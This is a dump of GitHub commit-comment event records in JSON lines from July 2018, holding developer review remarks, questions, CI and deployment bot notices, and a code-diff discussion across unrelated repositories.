{"id":"8019494972","type":"CommitCommentEvent","actor":{"login":"MrPotatobird"},"repo":{"name":"transhumandesign/kag-base"},"payload":{"comment":{"id":29836772,"position":null,"line":null,"path":null,"commit_id":"a6b3e16a8789ef758ebbb7b4a72f6bbc879131f7","created_at":"2018-07-25T23:04:43Z","updated_at":"2018-07-25T23:04:43Z","author_association":"CONTRIBUTOR","body":"I dunno about this, I would rather revert it and have the default mechanics - where you have access to the inventory button whenever you press E but the button is grayed out outside of enableRadius.\r\n\r\nThe normal inventory enableRadius is maybe a bit large but I feel that not only does this change make the access range too small but it also doesn't show a button at all if you press E out of range, so you can't press and hold E until you're close enough like you can with default inventory button / when inserting an item."}},"created_at":"2018-07-25T23:04:43Z"}
{"id":"8019507352","type":"CommitCommentEvent","actor":{"login":"weiweishi"},"repo":{"name":"ualbertalib/pushmi_pullyu"},"payload":{"comment":{"id":29836796,"position":null,"line":null,"path":null,"commit_id":"54e1f7184807b69647fc78a4760288404a70b0a4","created_at":"2018-07-25T23:08:06Z","updated_at":"2018-07-25T23:08:06Z","author_association":"CONTRIBUTOR","body":"thanks! should've paid more attention to the reason it failed.\n\n\n*Weiwei Shi*Digital Initiative Applications Librarian\n\n2-10L Cameron Library, University of Alberta\n780-492-7802  |  weiwei.shi@ualberta.ca\n*\"The University of Alberta respectfully acknowledges that we are situated\non Treaty 6 territory, traditional lands of First Nations and Métis\npeople.\"*\n\nOn Wed, Jul 25, 2018 at 5:01 PM, Shane Murnaghan <notifications@github.com>\nwrote:\n\n> @weiweishi <https://github.com/weiweishi>\n>\n> This one worked. It was just a different cop failing.... Can't have empty\n> white space at the end of a class:\n>\n> https://travis-ci.org/ualbertalib/pushmi_pullyu/jobs/408278811\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ualbertalib/pushmi_pullyu/commit/54e1f7184807b69647fc78a4760288404a70b0a4#commitcomment-29836744>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB8-fsGJvYFpNwMF1J644xL1bZX3eUqxks5uKPjmgaJpZM4Vg7YM>\n> .\n>\n"}},"created_at":"2018-07-25T23:08:06Z"}
{"id":"8019510249","type":"CommitCommentEvent","actor":{"login":"DanilloFernandes97"},"repo":{"name":"LeonardoJRibeiro/tramoia"},"payload":{"comment":{"id":29836804,"position":null,"line":null,"path":null,"commit_id":"5b7d2cf80ea09efe1f543f1f760b0151d2d4fbd5","created_at":"2018-07-25T23:09:02Z","updated_at":"2018-07-25T23:09:02Z","author_association":"COLLABORATOR","body":"Não precisa ficar esparrando o óbvio..."}},"created_at":"2018-07-25T23:09:02Z"}
{"id":"8019513952","type":"CommitCommentEvent","actor":{"login":"MarkEWaite"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29836820,"position":6,"line":966,"path":"src/main/java/org/jenkinsci/plugins/gitclient/CliGitAPIImpl.java","commit_id":"28db63d60dca2c20c714036c26b9208bd2a6bbbb","created_at":"2018-07-25T23:10:17Z","updated_at":"2018-07-25T23:10:17Z","author_association":"CONTRIBUTOR","body":"As far as I can tell, the `--init` is used with `--recursive` to assure that all the submodules are initialized (recursively).\r\n\r\nSince the submoduleInit() is called in the command line git implementation, it seems very reasonable to also make that same call in the JGit implementation.\r\n\r\nI'd rather not have the submoduleInit() added to the tests, since I think it is better to insert that into the JGitAPIImpl."}},"created_at":"2018-07-25T23:10:17Z"}
{"id":"8019516436","type":"CommitCommentEvent","actor":{"login":"Theavee"},"repo":{"name":"Theavee/Theavee.github.io"},"payload":{"comment":{"id":29836828,"position":null,"line":null,"path":null,"commit_id":"ba88ea400be951e25e921dc3bf4f053822d187c2","created_at":"2018-07-25T23:11:05Z","updated_at":"2018-07-25T23:11:05Z","author_association":"OWNER","body":"spelling mistake correction "}},"created_at":"2018-07-25T23:11:05Z"}
{"id":"8019522152","type":"CommitCommentEvent","actor":{"login":"cjbj"},"repo":{"name":"go-goracle/goracle"},"payload":{"comment":{"id":29836844,"position":75,"line":546,"path":"drv.go","commit_id":"554bb29a03b89e333e37565c74246e6c72023929","created_at":"2018-07-25T23:12:50Z","updated_at":"2018-07-25T23:12:50Z","author_association":"NONE","body":"`standaloneConnection` ?  Or use `ConnectionPool`?  Depending how you want the boolean values to default and be used.\r\n\r\nOr what about treating poolMinSessions=0 as non pooling?  (I'm not sure I like this)"}},"created_at":"2018-07-25T23:12:50Z"}
{"id":"8019522282","type":"CommitCommentEvent","actor":{"login":"Sout"},"repo":{"name":"NTIA/gr-ltetrigger"},"payload":{"comment":{"id":29836846,"position":null,"line":null,"path":null,"commit_id":"b634ea47708b1f76f1bd29853291eb7df25e0a9f","created_at":"2018-07-25T23:12:53Z","updated_at":"2018-07-25T23:12:53Z","author_association":"CONTRIBUTOR","body":"sure thing (first sorry for the Terrible commit message).\r\nWe know `srslte_ue_mib_decode` has changed and that is still does decoding https://github.com/srsLTE/srsLTE/blob/master/lib/examples/cell_measurement.c#L317 . Doing a diff of that we find the change is\r\n```\r\n-int srslte_ue_mib_decode(srslte_ue_mib_t * q, cf_t *input, \r\n+int srslte_ue_mib_decode(srslte_ue_mib_t * q,\r\n\r\n\r\n -  srslte_ofdm_rx_sf(&q->fft, input, q->sf_symbols);\r\n+  srslte_ofdm_rx_sf(&q->fft);\r\n```\r\nback tracing a bit more\r\n```\r\n-void srslte_ofdm_rx_sf(srslte_ofdm_t *q, cf_t *input, cf_t *output) {\r\n 897 -  uint32_t n; \r\n 898 +void srslte_ofdm_rx_sf(srslte_ofdm_t *q) {\r\n 899 +  uint32_t n;\r\n 900    if (q->freq_shift) {\r\n 901 -    srslte_vec_prod_ccc(input, q->shift_buffer, input, 2*q->slot_sz);\r\n 902 +    srslte_vec_prod_ccc(q->in_buffer, q->shift_buffer, q->in_buffer, 2*q->slot_sz);\r\n 903    }\r\n 904    if(!q->mbsfn_subframe){\r\n 905      for (n=0;n<2;n++) {\r\n 906 -      srslte_ofdm_rx_slot(q, &input[n*q->slot_sz], &output[n*q->nof_re*q->nof_symbols]);\r\n 907 +      srslte_ofdm_rx_slot(q, n);\r\n 908      }\r\n 909    }                                 \r\n 910    else{\r\n 911 -    srslte_ofdm_rx_slot_mbsfn(q, &input[0*q->slot_sz], &output[0*q->nof_re*q->nof_symbols]);\r\n 912 -    srslte_ofdm_rx_slot(q, &input[1*q->slot_sz], &output[1*q->nof_re*q->nof_symbols]);\r\n 913 +    srslte_ofdm_rx_slot_mbsfn(q, &q->in_buffer[0*q->slot_sz], &q->out_buffer[0*q->nof_re*q->nof_symbols]);\r\n 914 +    srslte_ofdm_rx_slot(q, 1);\r\n 915    }                                     \r\n 916  }\r\n```\r\nThus `input` has become `q->in_buffer`.  So where is this `q->in_buffer` set?\r\nWell in https://github.com/srsLTE/srsLTE/blob/master/lib/src/phy/dft/ofdm.c#L47 which is called by.\r\n```\r\nint srslte_ue_mib_init(srslte_ue_mib_t * q,  cf_t *in_buffer[SRSLTE_MAX_PORTS],                   uint32_t max_prb)`\r\n.\r\n.\r\n.\r\nif (srslte_ofdm_rx_init(&q->fft, SRSLTE_CP_NORM, in_buffer[0], q->sf_symbols, max_prb)) {\r\n```\r\nThus we need to initalize our `srslte_ue_mib` struct to point to our buffer input.\r\n\r\nNote:  https://github.com/srsLTE/srsLTE/blob/master/lib/examples/cell_measurement.c#L305 uses `srslte_ue_sync_zerocopy_multi` to read a file or buffer for more data.\r\n"}},"created_at":"2018-07-25T23:12:53Z"}
{"id":"8019522757","type":"CommitCommentEvent","actor":{"login":"Alucard648"},"repo":{"name":"Coolcord/Level-Headed"},"payload":{"comment":{"id":29836849,"position":null,"line":null,"path":null,"commit_id":"e0a4d11aef6d4aca20f29fd5888e3099421f7ca9","created_at":"2018-07-25T23:13:02Z","updated_at":"2018-07-25T23:13:02Z","author_association":"NONE","body":"What means Permadwath? One life and no way to gain 1-ups?"}},"created_at":"2018-07-25T23:13:02Z"}
{"id":"8019528745","type":"CommitCommentEvent","actor":{"login":"andreiw"},"repo":{"name":"andreiw/raspberry-pi3-atf"},"payload":{"comment":{"id":29836866,"position":null,"line":null,"path":null,"commit_id":"11c9a950ea89a753e473c8b66d6cfe23e9ce7e42","created_at":"2018-07-25T23:14:58Z","updated_at":"2018-07-25T23:14:58Z","author_association":"OWNER","body":"It would be great to be able to share feedback like yours, Christina’s or mine with the Pi Foundation or Avago, but I don’t think anyone is listening. *sigh*\n\nA\n\n> On Jul 25, 2018, at 6:51 PM, satmandu <notifications@github.com> wrote:\n> \n> @andreiw I was in no way impugning your work, or the scope of your project, which I think is laudable. I agree that it seems that a secure setup with the RPi is neither viable nor possible in its current incarnation due to a multitude of factors. In the larger sense, it makes no sense for me to nitpick one small hole in a deeply problematic security surface.\n> \n> I think you put it best as a usefully cheap device for tinkering with code which will be implemented on better hardware.\n> \n> Hopefully the RPi foundation can be nudged towards fixing some of those platform issues with their next iteration, as the device is being used widely, and not just for hobby use.\n> \n> Thanks again.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-25T23:14:58Z"}
{"id":"8019530723","type":"CommitCommentEvent","actor":{"login":"Darcman99"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29836874,"position":null,"line":null,"path":null,"commit_id":"ad23c9ef2357081c0c764016638776e60bb210ad","created_at":"2018-07-25T23:15:35Z","updated_at":"2018-07-25T23:15:35Z","author_association":"OWNER","body":"(The sprite is my concern right now, not balance.)"}},"created_at":"2018-07-25T23:15:35Z"}
{"id":"8019532547","type":"CommitCommentEvent","actor":{"login":"mdhancher"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29836878,"position":null,"line":null,"path":null,"commit_id":"58d8db3081d7e0a3ed62121b33a60283303d8880","created_at":"2018-07-25T23:16:09Z","updated_at":"2018-07-25T23:16:09Z","author_association":"CONTRIBUTOR","body":"I'll do a little poking around internally. I'm about to head out on vacation, though, so you might not hear from me for a few weeks."}},"created_at":"2018-07-25T23:16:09Z"}
{"id":"8019532742","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29836880,"position":null,"line":null,"path":null,"commit_id":"cb15368929777bc14a3f4d765bd30d8d02afe040","created_at":"2018-07-25T23:16:13Z","updated_at":"2018-07-25T23:16:13Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1061](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1061).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1061-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T23:16:13Z"}
{"id":"8019534891","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29836885,"position":null,"line":null,"path":null,"commit_id":"0051fe115ecc353d42b7e89b0bbb2a72e2416c07","created_at":"2018-07-25T23:16:54Z","updated_at":"2018-07-25T23:16:54Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/0051fe115ecc353d42b7e89b0bbb2a72e2416c07/index.html"}},"created_at":"2018-07-25T23:16:54Z"}
{"id":"8019535084","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29836886,"position":null,"line":null,"path":null,"commit_id":"02a085c1f9902d94a25e8cdffafc16eb7ff8a4a2","created_at":"2018-07-25T23:16:57Z","updated_at":"2018-07-25T23:16:57Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2048/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 20989 seconds\n\nTests produced 2794 warnings. 2794 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-25T23:16:57Z"}
{"id":"8019537847","type":"CommitCommentEvent","actor":{"login":"Coolcord"},"repo":{"name":"Coolcord/Level-Headed"},"payload":{"comment":{"id":29836897,"position":null,"line":null,"path":null,"commit_id":"e0a4d11aef6d4aca20f29fd5888e3099421f7ca9","created_at":"2018-07-25T23:17:53Z","updated_at":"2018-07-25T23:17:53Z","author_association":"OWNER","body":"Yeah, it's one life with no way to earn lives, as coins and 1-ups won't increment the life counter. Also, the A+Start continue code will be disabled, so you'll always have to restart from World 1-1.\r\n\r\nPermadeath will just be another option along with infinite lives and setting the starting lives, so it'll be entirely optional."}},"created_at":"2018-07-25T23:17:53Z"}
{"id":"8019539972","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29836903,"position":null,"line":null,"path":null,"commit_id":"0051fe115ecc353d42b7e89b0bbb2a72e2416c07","created_at":"2018-07-25T23:18:33Z","updated_at":"2018-07-25T23:18:33Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/0051fe115ecc353d42b7e89b0bbb2a72e2416c07/index.html"}},"created_at":"2018-07-25T23:18:33Z"}
{"id":"8019541300","type":"CommitCommentEvent","actor":{"login":"nikglavin"},"repo":{"name":"braintree/braintree-web"},"payload":{"comment":{"id":29836908,"position":5,"line":5,"path":"src/hosted-fields/shared/get-card-types.js","commit_id":"330bd06d53be4fb8fc9aa51c4f0c19631c3af69e","created_at":"2018-07-25T23:18:58Z","updated_at":"2018-07-25T23:18:58Z","author_association":"NONE","body":"will do thanks"}},"created_at":"2018-07-25T23:18:58Z"}
{"id":"8019542559","type":"CommitCommentEvent","actor":{"login":"bossanova808"},"repo":{"name":"FosterCommerce/CommerceRegisterOnCheckout"},"payload":{"comment":{"id":29836913,"position":null,"line":null,"path":null,"commit_id":"3e3470f23e006ce3f35a3bc9408ef4f19028a9c6","created_at":"2018-07-25T23:19:24Z","updated_at":"2018-07-25T23:19:24Z","author_association":"NONE","body":"Hey folks\r\n\r\nThis is awesome, will definitely save me some time when I finally get to working on my switch to Craft3 soon (current plan is to begin that in August - been a busy year!!).\r\n\r\nI don't really have any facility to check it or anything yet, but am happy for you to do that and basically just let me know when you feel it is ready and we can get it happening (and into the plugins store too I guess!).\r\n\r\nThanks for this!"}},"created_at":"2018-07-25T23:19:24Z"}
{"id":"8019543908","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29836917,"position":null,"line":null,"path":null,"commit_id":"93e4bfadb89388c480865783060f3728b3e0f6b1","created_at":"2018-07-25T23:19:52Z","updated_at":"2018-07-25T23:19:52Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-51](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-51).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-51-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-25T23:19:52Z"}
{"id":"8019545618","type":"CommitCommentEvent","actor":{"login":"ofuen"},"repo":{"name":"ofuen/BootstrapPortfolio"},"payload":{"comment":{"id":29836919,"position":null,"line":null,"path":null,"commit_id":"46fd4edd2a4573cff3f6328e1be6ba831e857c42","created_at":"2018-07-25T23:20:24Z","updated_at":"2018-07-25T23:20:24Z","author_association":"OWNER","body":"<Bookmark> update readme"}},"created_at":"2018-07-25T23:20:24Z"}
{"id":"8019547078","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29836923,"position":null,"line":null,"path":null,"commit_id":"b46a59f1255e62b9b5754a8a5df50d346aacda3c","created_at":"2018-07-25T23:20:53Z","updated_at":"2018-07-25T23:20:53Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1064](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1064).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1064-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T23:20:53Z"}
{"id":"8019551563","type":"CommitCommentEvent","actor":{"login":"jmroot"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29836934,"position":26,"line":47,"path":"python/py-pip/Portfile","commit_id":"20cb01293c527abada0293bb7ea5d58afaf261ce","created_at":"2018-07-25T23:22:20Z","updated_at":"2018-07-25T23:22:20Z","author_association":"MEMBER","body":"There is only one value in ${python.version}, so there's no need to use lsearch here."}},"created_at":"2018-07-25T23:22:20Z"}
{"id":"8019551670","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29836936,"position":null,"line":null,"path":null,"commit_id":"191614891da14d4c563ac634afe7e99d155cf193","created_at":"2018-07-25T23:22:22Z","updated_at":"2018-07-25T23:22:22Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/191614891da14d4c563ac634afe7e99d155cf193/index.html"}},"created_at":"2018-07-25T23:22:22Z"}
{"id":"8019574502","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29837015,"position":null,"line":null,"path":null,"commit_id":"f2973055f4db295609d7d4ae36d61229efb18057","created_at":"2018-07-25T23:30:07Z","updated_at":"2018-07-25T23:30:07Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-25T23:30:07Z"}
{"id":"8019581553","type":"CommitCommentEvent","actor":{"login":"repository"},"repo":{"name":"hemillainysantos/pre-matricula-backend"},"payload":{"comment":{"id":29837045,"position":null,"line":null,"path":null,"commit_id":"4a8c3dbce42de09817a04070ab937b80bc3345f8","created_at":"2018-07-25T23:32:32Z","updated_at":"2018-07-25T23:32:32Z","author_association":"NONE","body":"This is fun."}},"created_at":"2018-07-25T23:32:32Z"}
{"id":"8019582187","type":"CommitCommentEvent","actor":{"login":"johnsonebby"},"repo":{"name":"JensPLarsen/ChromeExtension-GoogleDocsUtil"},"payload":{"comment":{"id":29837047,"position":null,"line":null,"path":null,"commit_id":"5d2139a873a88677184a068e5cdd77d35d916951","created_at":"2018-07-25T23:32:46Z","updated_at":"2018-07-25T23:32:46Z","author_association":"NONE","body":"Hi, \r\n\r\n i am trying to get this working in my chrome extension, but does not work it shows Undefined on the popup on clicking the extension button.\r\n\r\ncould you please help me out.\r\n\r\ncheers,\r\nJohnson"}},"created_at":"2018-07-25T23:32:46Z"}
{"id":"8019591987","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29837080,"position":null,"line":null,"path":null,"commit_id":"cb15368929777bc14a3f4d765bd30d8d02afe040","created_at":"2018-07-25T23:36:12Z","updated_at":"2018-07-25T23:36:12Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1067](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1067).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1067-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T23:36:12Z"}
{"id":"8019604327","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29837129,"position":null,"line":null,"path":null,"commit_id":"f9484ccf3660fb724f5e3a7e608b70510ebe0c60","created_at":"2018-07-25T23:40:43Z","updated_at":"2018-07-25T23:40:43Z","author_association":"CONTRIBUTOR","body":"why does tilt say recover?\r\n"}},"created_at":"2018-07-25T23:40:43Z"}
{"id":"8019607006","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29837139,"position":null,"line":null,"path":null,"commit_id":"ec103ced13a1212099ebe41896937d3ae30f5489","created_at":"2018-07-25T23:41:38Z","updated_at":"2018-07-25T23:41:38Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/ec103ced13a1212099ebe41896937d3ae30f5489/index.html"}},"created_at":"2018-07-25T23:41:38Z"}
{"id":"8019622694","type":"CommitCommentEvent","actor":{"login":"WFGMPnSJFWP"},"repo":{"name":"timgrossmann/InstaPy"},"payload":{"comment":{"id":29837187,"position":3,"line":362,"path":"instapy/unfollow_util.py","commit_id":"e504245e102f9bd2b1844130c0fb6d8b95833eb0","created_at":"2018-07-25T23:47:05Z","updated_at":"2018-07-25T23:47:05Z","author_association":"NONE","body":"None"}},"created_at":"2018-07-25T23:47:05Z"}
{"id":"8019630250","type":"CommitCommentEvent","actor":{"login":"Anchors19"},"repo":{"name":"Anchors19/Recipe-Analysis"},"payload":{"comment":{"id":29837198,"position":null,"line":null,"path":null,"commit_id":"77f80de6e4526167c0c9add448a374185a3768b6","created_at":"2018-07-25T23:49:42Z","updated_at":"2018-07-25T23:49:42Z","author_association":"OWNER","body":"Analysis, visualizations, and model code"}},"created_at":"2018-07-25T23:49:42Z"}
{"id":"8019631526","type":"CommitCommentEvent","actor":{"login":"CyrusNajmabadi"},"repo":{"name":"dotnet/roslyn"},"payload":{"comment":{"id":29837200,"position":2,"line":61,"path":"src/EditorFeatures/Core/Implementation/IntelliSense/EditorCompletionImplementation/CompletionCommitManager.cs","commit_id":"824a70331b26bcc8a6811773b1844aea939211dd","created_at":"2018-07-25T23:50:10Z","updated_at":"2018-07-25T23:50:10Z","author_association":"CONTRIBUTOR","body":"why are we checking specific languuage names at a 'common/core' level?  This is a layering violation."}},"created_at":"2018-07-25T23:50:10Z"}
{"id":"8019634239","type":"CommitCommentEvent","actor":{"login":"CyrusNajmabadi"},"repo":{"name":"dotnet/roslyn"},"payload":{"comment":{"id":29837206,"position":5,"line":63,"path":"src/EditorFeatures/Core/Implementation/IntelliSense/EditorCompletionImplementation/CompletionCommitManager.cs","commit_id":"824a70331b26bcc8a6811773b1844aea939211dd","created_at":"2018-07-25T23:50:59Z","updated_at":"2018-07-25T23:50:59Z","author_association":"CONTRIBUTOR","body":"how does this get controlled now:\r\n\r\n![image](https://user-images.githubusercontent.com/4564579/43233466-e6602cc4-902a-11e8-801a-b41242775367.png)\r\n\r\n?"}},"created_at":"2018-07-25T23:50:59Z"}
{"id":"8019643480","type":"CommitCommentEvent","actor":{"login":"chrisdilbert"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29837226,"position":null,"line":null,"path":null,"commit_id":"2054b5928574affbb7efcd8a9ab146ee4fa34938","created_at":"2018-07-25T23:54:21Z","updated_at":"2018-07-25T23:54:21Z","author_association":"NONE","body":"If you create new rows for any many2many fields will cause an error, because this method returns the Pseudo-ids for new records on string format and the  method to render row  tries to parse the pseudo Id string into integer\r\n\r\n![2](https://user-images.githubusercontent.com/239224/43233512-e6b2fd8a-903b-11e8-9b39-e8f642daad54.png)\r\n![1](https://user-images.githubusercontent.com/239224/43233513-e8ad4d0c-903b-11e8-8e5d-39a9e98b5c88.png)\r\n"}},"created_at":"2018-07-25T23:54:21Z"}
{"id":"8019654460","type":"CommitCommentEvent","actor":{"login":"apdaglian"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":29837250,"position":null,"line":null,"path":null,"commit_id":"04bdeb8321329e5ffe5a2ead4f792023a66d31b6","created_at":"2018-07-25T23:58:16Z","updated_at":"2018-07-25T23:58:16Z","author_association":"NONE","body":"I tried doing this yesterday. To call me a programming amateur would be an insult to programming amateurs. Needless to say, I have no idea how to do this stuff, I just love Gramps and wanted to help. Made a donation instead! Anyways, thanks for doing this. "}},"created_at":"2018-07-25T23:58:16Z"}
{"id":"8019656745","type":"CommitCommentEvent","actor":{"login":"Uhuh"},"repo":{"name":"Uhuh/PankyBot"},"payload":{"comment":{"id":29837256,"position":null,"line":null,"path":null,"commit_id":"51abf4c899eb07c58c222614a7cff328576795cd","created_at":"2018-07-25T23:59:09Z","updated_at":"2018-07-25T23:59:09Z","author_association":"OWNER","body":"My git was acting up or something hence the commit.\r\n\r\n* Wasn't logging users that were connecting to voice chats and didn't log ones that were currently connected.\r\nThis fixes that and also kind of cleans up the code"}},"created_at":"2018-07-25T23:59:09Z"}
{"id":"8013880664","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29823315,"position":4,"line":615,"path":"users.js","commit_id":"39606a179b6ae5dc9c8bbc7bb0858fe94f1b051c","created_at":"2018-07-25T03:01:05Z","updated_at":"2018-07-25T03:01:05Z","author_association":"CONTRIBUTOR","body":"Oh, yeah, that makes sense. I just figured if they have the same authority, then it ought to be reflected on the userlist as it usually is, but I guess others think differently"}},"created_at":"2018-07-25T03:01:05Z"}
{"id":"8013882735","type":"CommitCommentEvent","actor":{"login":"houjb"},"repo":{"name":"romanchereshnev/HuGaDB"},"payload":{"comment":{"id":29823318,"position":null,"line":null,"path":null,"commit_id":"f99dbf85b38e4cd79ccaec70ee12ae9d68f3ad22","created_at":"2018-07-25T03:01:47Z","updated_at":"2018-07-25T03:01:47Z","author_association":"NONE","body":"Hello，I need help. The zip file I downloaded cannot be decompressed normally."}},"created_at":"2018-07-25T03:01:47Z"}
{"id":"8013882910","type":"CommitCommentEvent","actor":{"login":"dindinw"},"repo":{"name":"DAGfans/DAG_paper"},"payload":{"comment":{"id":29823320,"position":null,"line":null,"path":null,"commit_id":"50932d770a13b71c23ebc0d1036ec0320b9c87d2","created_at":"2018-07-25T03:01:52Z","updated_at":"2018-07-25T03:01:52Z","author_association":"CONTRIBUTOR","body":"@SkyeOreo what' the different between the two phantom papers?  if the latest one you upload is the reversion edition, please replaced the old one (`SZ18_PHANTOM_A Scalable BlockDAG protocol.pdf`)by using the correct naming conversion. If not, please add more detail description about the difference of the two papers.  "}},"created_at":"2018-07-25T03:01:52Z"}
{"id":"8013884827","type":"CommitCommentEvent","actor":{"login":"punchcutter"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29823325,"position":null,"line":null,"path":null,"commit_id":"62fa7cd1ccff4d4448ef84f9cc146464672636aa","created_at":"2018-07-25T03:02:35Z","updated_at":"2018-07-25T03:02:35Z","author_association":"NONE","body":"Yes, the available text is inconsistent mostly because it was done way before USE shaping took over for Chakma so that's definitely been annoying to deal with. I agree we should try to avoid visually indistinguishable inequivalent sequences so it would be nice to have a document with some rules. Maybe we can start a discussion elsewhere with Bivuti and try to lock this down. "}},"created_at":"2018-07-25T03:02:35Z"}
{"id":"8013887399","type":"CommitCommentEvent","actor":{"login":"nponeccop"},"repo":{"name":"haskell/haskell-ide-engine"},"payload":{"comment":{"id":29823333,"position":null,"line":null,"path":null,"commit_id":"d5972f3f55964e7d261c9004bbee4dd81b96a44c","created_at":"2018-07-25T03:03:30Z","updated_at":"2018-07-25T03:03:30Z","author_association":"COLLABORATOR","body":"The commit name is terrible, use something like \"remove unused imports\" next time."}},"created_at":"2018-07-25T03:03:30Z"}
{"id":"8013887641","type":"CommitCommentEvent","actor":{"login":"kenan249"},"repo":{"name":"kenan249/firebase"},"payload":{"comment":{"id":29823335,"position":null,"line":null,"path":null,"commit_id":"3fa865bb70fd68adcf26e33550639242f481dc9e","created_at":"2018-07-25T03:03:36Z","updated_at":"2018-07-25T03:03:36Z","author_association":"OWNER","body":"cambios"}},"created_at":"2018-07-25T03:03:36Z"}
{"id":"8013892330","type":"CommitCommentEvent","actor":{"login":"notestaff"},"repo":{"name":"broadinstitute/viral-ngs"},"payload":{"comment":{"id":29823340,"position":25,"line":114,"path":"tools/snpeff.py","commit_id":"4dea8e23fe8dc4427604414415132867bf384238","created_at":"2018-07-25T03:05:19Z","updated_at":"2018-07-25T03:05:19Z","author_association":"CONTRIBUTOR","body":"@tomkinsc py27 doesn't have subprocess.DEVNULL ."}},"created_at":"2018-07-25T03:05:19Z"}
{"id":"8013893241","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29823344,"position":41,"line":119,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"2458d2aa294aced1785394660c3ea434b4493fd1","created_at":"2018-07-25T03:05:41Z","updated_at":"2018-07-25T03:05:41Z","author_association":"OWNER","body":"> The \"objectness\" confidence score estimates how likely it is that the box fits an object.\r\n\r\nThe objectness predicts the intersection over union (IOU) of the ground truth and the proposed box."}},"created_at":"2018-07-25T03:05:41Z"}
{"id":"8013895136","type":"CommitCommentEvent","actor":{"login":"sarawut11"},"repo":{"name":"216k155/lux"},"payload":{"comment":{"id":29823349,"position":null,"line":null,"path":null,"commit_id":"7042559553c02982e6ecfc5fa3851fa69fa0e811","created_at":"2018-07-25T03:06:25Z","updated_at":"2018-07-25T03:06:25Z","author_association":"COLLABORATOR","body":"Also, used other way to get file size\r\nPrevious commit occurred a bug on win build when it gets the file size\r\nI think, new commit will solve that issue"}},"created_at":"2018-07-25T03:06:25Z"}
